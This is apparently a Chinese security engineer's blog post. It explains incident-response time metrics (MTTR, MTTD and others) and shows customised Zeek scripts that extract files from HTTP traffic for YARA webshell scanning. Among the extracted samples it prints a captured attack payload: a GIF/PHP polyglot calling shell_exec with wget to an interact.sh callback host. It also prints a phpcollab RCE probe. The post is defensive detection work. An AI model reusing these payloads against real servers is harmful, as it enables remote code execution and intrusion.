      MTTR(平均恢复时间)是指从产品或系统故障中恢复的平均时间。这包括从系统或产品发生故障到其重新完全运作的整个中断时间。

    • 如何计算MTTR(平均恢复时间)?

      MTTR = 将故障时间与恢复时间相加/故障数量

      例如:我们的系统在24小时内在两个独立事件中停机了30分钟。30除以2是15,所以我们的MTTR是15分钟。

      注意:这个指标它包括故障现象出现到告警发出的这段延迟时间与respond有着明显的区别。

  • 平均解决时间(Mean time to resolve)

    • 什么是MTTR(平均解决时间)?

      MTTR(平均解决时间)是指完全解决一个故障所需的平均时间。这不仅包括检测故障、诊断问题和修复问题的时间,还包括确保故障不会再次发生的时间。这个指标代表从“救火”到“防火”的转变。

    • 如何计算MTTR(平均解决时间)?

      MTTR = 将故障时间与完全解决之间的时间相加/故障数量

      例如:你的系统在24小时内的一次事件中总共瘫痪了两个小时,而团队又花了两个小时进行修复,以确保系统中断不会再次发生,这就是解决该问题的总时间。这意味着你的MTTR是四个小时。

      注意:MTTR 最常使用工作时间(8小时)计算(假设你在下班时将故障恢复,并在第二天上班时解决潜在问题,那么你的 MTTR 将不包括下班的16小时)。如果你的团队在能够7X24小时,或者有值班员工在下班后工作,那么这个指标将可以进行适当的微调。

  • 平均响应时间(Mean time to respond)

    • 什么是MTTR(平均响应时间)?

      MTTR(平均响应时间)是指从第一次收到警报时起,直到产品或系统从故障中恢复所需的平均时间。

    • 如何计算MTTR(平均响应时间)?

      MTTR = 检测告警与服务恢复之间的总时间/事件数量

      示例:如果你在一个40小时的工作周里发生了四起事件,并且在这些事件上总共花了一个小时(从警报到恢复),那么你那一周的MTTR将是15分钟。

      注意:平均响应时间不考虑问题已经存在但未被识别的时间。

举个“栗子”

应急响应KPI时间线

image-20220208010258629

  1. MTTD:告警群在12:05上报一起安全告警,(假设告警每5分钟同步一次到群里,理想情况下告警应近乎实时)。MTTD:5分钟(12:05 - 12:00 = 5
  2. MTTA:安全运营团队在12:10开始处理此告警并确认这是一起真实的网络入侵事件,同一时间应急响应团队介入。MTTA:5分钟(12:10 - 12:05 = 5
  3. MTTI:应急响应团队在12:25完成初步分析并根据已有应急预案拟定遏制方案。MTTI:15分钟(12:25 - 12:10 = 15
  4. MTTC:根据预案安全运营团队在12:35完成了安全组件的规则调整,并删除已识别的后门木马遏制了攻击者的利用“路径”。为后续的根除威胁争取到了充足的时间。MTTC:30分钟(12:35 - 12:05 = 30
  5. MTTR:12:50正式通知重新上线业务恢复对外服务。MTTR(Respond):45分钟(12:50 - 12:05 = 45)、MTTR(Recovery):50分钟(12:50 - 12:00 = 50);

背景

最近在研究如何将Wazuh与YARA整合,也就是当触发Wazuh FIM事件时通过使用Wazuh主动响应模块自动执行YARA扫描。该功能将扫描集中在新文件或最近修改过的文件上,从而优化了被监控端点的资源消耗。由于我司的业务特性,最先想到的场景就是WebShell的检测了。

下面来说说在实际环境中带来的“挑战”吧。该功能主要是依托Wazuh FIM事件,如果大家熟悉Wazuh的话都应该知道,触发FIM事件的必要条件是指定监控目录。那么,当你拿着从CMDB筛选出的Web服务器给到运维询问Web路径时,你很可能无法得到你想要的答案。对于这种路径不统一的情况,你可以选择自己人工手动收集并维护,如果面对上千台的服务器,那会花费大量的时间成本,或者你可以选择将问题上升推进整改(这条“路”不好走啊😂)。

办法总比困难多

都说上帝为你关了一扇门,必定会为你打开一扇窗。某天在写代码时看到Twitter推了一条Zeek的动态,此时,我悟了😅!纠结个毛的路径?我直接把需要的数据在NTA上还原出来不就得了,只需将EDR装在NTA上并监控文件还原的目录即可。至于我为啥选择Zeek没用Suricata,主要还是因为Zeek可定制化程度比Suricata更高一些。另外一点Zeek支持集群化部署,规则可以直接由Manager统一下发,这点要比Suricata方便很多,当然这也得益于集群的优势。

说回文件还原的事儿,Zeek上已经有 “前人” (hosom) 写过一个文件还原的模块。不过在使用中也发现了一些不太贴合我这边实际场景的情况,好在Zeek非常的“Open”😁只需要稍加改动就可以满足我的需求了。

做了哪些改进

  • 去其糠糟,取其精华

    Zeek 和 Suricata 记录日志的方式比较相似,都是根据事件类型来记录日志。正因如此,若想对文件还原事件进行溯源,还需借助协议解析日志来进行上下文的关联。例如,通过HTTP协议还原的文件,就需要借助http.log。由于在我的实际环境中HTTP流量很大,如果不对协议解析的事件做过滤的话,那么输出的日志量会非常的“恐怖”。因此,我做了一些优化,现在只有当匹配到文件还原事件后,才会输出对应的协议解析事件。

    file-extension-logs.zeek

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    module Enrichment;

    redef record Files::Info += {
    flags: string &default="";
    };

    hook Files::log_policy(rec: Files::Info, id: Log::ID, filter: Log::Filter)
    {
    if ( rec$flags == "" )
    break;
    }

    event zeek_init()
    {
    Log::remove_default_filter(Files::LOG);
    local filter: Log::Filter = [$name="file_extraction", $path="file-extraction"];
    Log::add_filter(Files::LOG, filter);
    }

    http-extension-logs.zeek

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    module Enrichment;

    redef record HTTP::Info += {
    records: bool &default=F;
    domain: string &optional &log;
    };

    hook HTTP::log_policy(rec: HTTP::Info, id: Log::ID, filter: Log::Filter)
    {
    if ( rec$records == F )
    break;
    }

    event zeek_init()
    {
    Log::remove_default_filter(HTTP::LOG);
    local filter: Log::Filter = [$name="http_extraction", $path="http-extraction"];
    Log::add_filter(HTTP::LOG, filter);
    }

    export {
    global http: function(f: fa_file): fa_file;
    }

    function http(f: fa_file): fa_file
    {
    f$http$records = T;
    f$http$domain = f$http$host;
    return f;
    }

    示例 - 1

    **http-extension-logs.zeek**,负责记录命中文件还原的协议解析事件,后期通过将2个事件fuid字段进行关联,可以帮助我们更好的去分析整个事件。

    image-20211101202304818

  • 更灵活,更强大

    ​ 支持根据文件类型选择hash或者extract

    hash: 只计算文件的HASH但不对此文件进行提取;

    extract: 还原指定类型的文件。支持针对HTTP协议,可选域名、URI、请求方法等字段组合进行提取,文件还原后按照日期存储;

    extract-custom.zeek

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    @load ../__load__

    module FileExtraction;

    const custom_types: set[string, string] = {
    ["image/jpeg", "hash"],
    ["image/png", "hash"],
    ["image/gif", "hash"],
    ["text/x-php", "extract"],
    ["application/x-executable", "extract"],
    ["application/x-pdf", "extract"],
    ["application/java-archive", "extract"],
    ["application/x-java-applet", "extract"],
    ["application/x-java-jnlp-file", "extract"],
    ["application/msword", "extract"],
    ["application/vnd.openxmlformats-officedocument.wordprocessingml.document", "extract"],
    ["application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", "extract"],
    ["application/vnd.openxmlformats-officedocument.presentationml.presentation", "extract"],
    };

    const custom_extract: set[string] = {
    ["POST"]
    };

    hook FileExtraction::extract(f: fa_file, meta: fa_metadata) &priority = 5
    {
    if ( [meta$mime_type, "extract"] in custom_types )
    {
    f$info$flags = "extract";
    break;
    }

    if ( [meta$mime_type, "hash"] in custom_types )
    {
    f$info$flags = "hash";
    break;
    }
    }

    hook FileExtraction::http_extract(f: fa_file, meta: fa_metadata) &priority = 5
    {
    if ( f$http?$host && f$http?$method && f$http?$uri && f$info$is_orig )
    if ( [f$http$method] in custom_extract )
    break;
    f$info$flags = "";
    }

    store-files-by-md5.zeek

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    @load ../__load__
    @load policy/frameworks/files/hash-all-files

    event file_state_remove(f: fa_file)
    {
    if ( !f$info?$extracted || !f$info?$md5 || FileExtraction::path == "" )
    return;

    local orig = f$info$extracted;

    local split_orig = split_string(f$info$extracted, /\./);
    local extension = split_orig[|split_orig|-1];

    # 按照日期进行文件的还原存储
    local ntime = fmt("%D", network_time());
    local ndate = sub_bytes(ntime, 1, 10);
    local dest_dir = fmt("%s%s", FileExtraction::path, ndate);
    mkdir(dest_dir);
    local dest = fmt("%s/%s-%s.%s", dest_dir, f$source, f$info$md5, extension);

    local cmd = fmt("mv %s %s", orig, dest);
    when ( local result = Exec::run([$cmd=cmd]) )
    {
    }

    if ( rename(orig, dest) )
    f$info$extracted = dest;
    }

示例 - 2

  • Zeek - Files

image-20211101213845765

  • ​ Zeek - HTTP

image-20211101220829730

1
2
$ more ./zeek/2021-11-01/HTTP-2f48899b463009a77234056c62f5c4fb.gif
GIF89a213213123<?php shell_exec("wget -c http://c5vi7ua23aksl756fsdgcf9186ayyyyoy.interact.sh");

示例 - 3

  • Zeek - Files

image-20211101214516921

  • Zeek - HTTP

image-20211101214915506

1
2
$ more ./zeek/2021-11-01/HTTP-c77da62fa1b8f687ea423581657dcc2c.php
<?php echo md5('phpcollab_rce');?>

小提示:

当启用文件提取时,记得调整Zeek的这个配置,指定最大提取数据大小,否则会出现提取被截段的现象。

  • file-extract_limit.zeek
1
redef FileExtract::default_limit = 5000000000;

项目地址